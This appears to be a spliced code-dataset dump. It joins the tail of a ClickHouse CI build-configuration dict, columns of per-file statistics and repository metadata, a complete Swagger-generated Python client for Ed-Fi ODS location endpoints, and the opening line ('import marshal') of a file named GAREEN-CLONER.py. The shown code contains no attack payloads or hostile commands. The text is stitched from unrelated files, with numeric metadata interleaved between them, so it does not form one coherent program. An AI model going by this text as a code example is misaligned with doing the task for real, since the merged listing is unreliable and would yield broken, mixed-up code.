"sanitizer": "none",
"bundled": "bundled",
"splitted": "splitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Testflows check (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (release-gcc, actions)": {
"required_build_properties": {
"compiler": "gcc-11",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (release-clang, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "binary",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (asan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (msan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (tsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (ubsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (ASan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (MSan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (TSan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (UBSan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Release (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests flaky check (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"ClickHouse Keeper Jepsen (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "binary",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
}
}
}
def build_config_to_string(build_config):
if build_config["package_type"] == "performance":
return "performance"
return "_".join([
build_config['compiler'],
build_config['build_type'] if build_config['build_type'] else "relwithdebuginfo",
build_config['sanitizer'] if build_config['sanitizer'] else "none",
build_config['bundled'],
build_config['splitted'],
'tidy' if 'tidy' in build_config and build_config['tidy'] == 'enable' else 'notidy',
'with_coverage' if 'with_coverage' in build_config and build_config['with_coverage'] else 'without_coverage',
build_config['package_type'],
])
| 35.006993
| 117
| 0.428206
| 1,637
| 25,030
| 6.337202
| 0.051313
| 0.072874
| 0.127241
| 0.130808
| 0.938693
| 0.93503
| 0.926644
| 0.924523
| 0.916908
| 0.911606
| 0
| 0.008903
| 0.430084
| 25,030
| 714
| 118
| 35.056022
| 0.718332
| 0.000839
| 0
| 0.730986
| 0
| 0
| 0.419226
| 0.044906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001408
| false
| 0
| 0
| 0
| 0.004225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1676e0fc9a16d29b4b083d4f9396b24e10f51606
| 35,013
|
py
|
Python
|
src/v5.1/resources/swagger_client/api/locations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 2
|
2021-04-27T17:18:17.000Z
|
2021-04-27T19:14:39.000Z
|
src/v5.1/resources/swagger_client/api/locations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | null | null | null |
src/v5.1/resources/swagger_client/api/locations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 1
|
2022-01-06T09:43:11.000Z
|
2022-01-06T09:43:11.000Z
|
# coding: utf-8
"""
Ed-Fi Operational Data Store API
The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501
OpenAPI spec version: 3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class LocationsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_location_by_id(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_location_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_location_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_location_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_location_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_location_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_location_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_location_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deletes_locations(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_locations(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deletes_locations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.deletes_locations_with_http_info(**kwargs) # noqa: E501
return data
def deletes_locations_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_locations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deletes_locations" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_locations`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `deletes_locations`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/deletes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EdFiLocation]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_locations(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str classroom_identification_code: A unique number or alphanumeric code assigned to a room by a school, school system, state, or other agency or entity.
:param int school_id: The identifier assigned to a school.
:param str id:
:param int maximum_number_of_seats: The most number of seats the class can maintain.
:param int optimal_number_of_seats: The number of seats that is most favorable to the class.
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_locations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_locations_with_http_info(**kwargs) # noqa: E501
return data
def get_locations_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves specific resources using the resource's property values (using the \"Get\" pattern). # noqa: E501
This GET operation provides access to resources using the \"Get\" search pattern. The values of any properties of the resource that are specified will be used to return all matching results (if it exists). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:param bool total_count: Indicates if the total number of items available should be returned in the 'Total-Count' header of the response. If set to false, 'Total-Count' header will not be provided.
:param str classroom_identification_code: A unique number or alphanumeric code assigned to a room by a school, school system, state, or other agency or entity.
:param int school_id: The identifier assigned to a school.
:param str id:
:param int maximum_number_of_seats: The most number of seats the class can maintain.
:param int optimal_number_of_seats: The number of seats that is most favorable to the class.
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'min_change_version', 'max_change_version', 'total_count', 'classroom_identification_code', 'school_id', 'id', 'maximum_number_of_seats', 'optimal_number_of_seats'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_locations" % key
)
params[key] = val
del params['kwargs']
if self.api_client.client_side_validation and ('limit' in params and params['limit'] > 500): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_locations`, must be a value less than or equal to `500`") # noqa: E501
if self.api_client.client_side_validation and ('limit' in params and params['limit'] < 0): # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_locations`, must be a value greater than or equal to `0`") # noqa: E501
if self.api_client.client_side_validation and ('classroom_identification_code' in params and
len(params['classroom_identification_code']) > 60):
raise ValueError("Invalid value for parameter `classroom_identification_code` when calling `get_locations`, length must be less than or equal to `60`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
if 'total_count' in params:
query_params.append(('totalCount', params['total_count'])) # noqa: E501
if 'classroom_identification_code' in params:
query_params.append(('classroomIdentificationCode', params['classroom_identification_code'])) # noqa: E501
if 'school_id' in params:
query_params.append(('schoolId', params['school_id'])) # noqa: E501
if 'id' in params:
query_params.append(('id', params['id'])) # noqa: E501
if 'maximum_number_of_seats' in params:
query_params.append(('maximumNumberOfSeats', params['maximum_number_of_seats'])) # noqa: E501
if 'optimal_number_of_seats' in params:
query_params.append(('optimalNumberOfSeats', params['optimal_number_of_seats'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EdFiLocation]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_locations_by_id(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:return: EdFiLocation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_locations_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_locations_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_locations_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_locations_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:return: EdFiLocation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_none_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_locations_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_locations_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_none_match' in params:
header_params['If-None-Match'] = params['if_none_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EdFiLocation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_location(self, location, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error (you must use a PUT operation to update a resource by \"id\"). The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_location(location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_location_with_http_info(location, **kwargs) # noqa: E501
else:
(data) = self.post_location_with_http_info(location, **kwargs) # noqa: E501
return data
def post_location_with_http_info(self, location, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error (you must use a PUT operation to update a resource by \"id\"). The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_location_with_http_info(location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_location" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location' is set
if self.api_client.client_side_validation and ('location' not in params or
params['location'] is None): # noqa: E501
raise ValueError("Missing the required parameter `location` when calling `post_location`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'location' in params:
body_params = params['location']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def put_location(self, id, location, **kwargs): # noqa: E501
"""Updates or creates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update or create a resource by identifier. If the resource doesn't exist, the resource will be created using that identifier. Additionally, natural key values cannot be changed using this operation, and will not be modified in the database. If the resource \"id\" is provided in the JSON body, it will be ignored as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_location(id, location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_location_with_http_info(id, location, **kwargs) # noqa: E501
else:
(data) = self.put_location_with_http_info(id, location, **kwargs) # noqa: E501
return data
def put_location_with_http_info(self, id, location, **kwargs): # noqa: E501
"""Updates or creates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update or create a resource by identifier. If the resource doesn't exist, the resource will be created using that identifier. Additionally, natural key values cannot be changed using this operation, and will not be modified in the database. If the resource \"id\" is provided in the JSON body, it will be ignored as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_location_with_http_info(id, location, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiLocation location: The JSON representation of the \"location\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'location', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_location" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `put_location`") # noqa: E501
# verify the required parameter 'location' is set
if self.api_client.client_side_validation and ('location' not in params or
params['location'] is None): # noqa: E501
raise ValueError("Missing the required parameter `location` when calling `put_location`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'location' in params:
body_params = params['location']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 50.018571
| 493
| 0.643789
| 4,334
| 35,013
| 5.013152
| 0.076142
| 0.045657
| 0.01795
| 0.019883
| 0.939522
| 0.92797
| 0.918627
| 0.910894
| 0.904589
| 0.901873
| 0
| 0.015927
| 0.273727
| 35,013
| 699
| 494
| 50.090129
| 0.838491
| 0.429069
| 0
| 0.77748
| 0
| 0.013405
| 0.219837
| 0.056467
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034853
| false
| 0
| 0.010724
| 0
| 0.096515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1683d311fd97d76cbce691765d75d8fa12cdca23
| 103,445
|
py
|
Python
|
GAREEN-CLONER.py
|
CLB-09/GAREEN-TOOLS
|
1d9349c835294329a2b140f1df21b95a509d7128
|
[
"Apache-2.0"
] | null | null | null |
GAREEN-CLONER.py
|
CLB-09/GAREEN-TOOLS
|
1d9349c835294329a2b140f1df21b95a509d7128
|
[
"Apache-2.0"
] | null | null | null |
GAREEN-CLONER.py
|
CLB-09/GAREEN-TOOLS
|
1d9349c835294329a2b140f1df21b95a509d7128
|
[
"Apache-2.0"
] | null | null | null |
import marshal
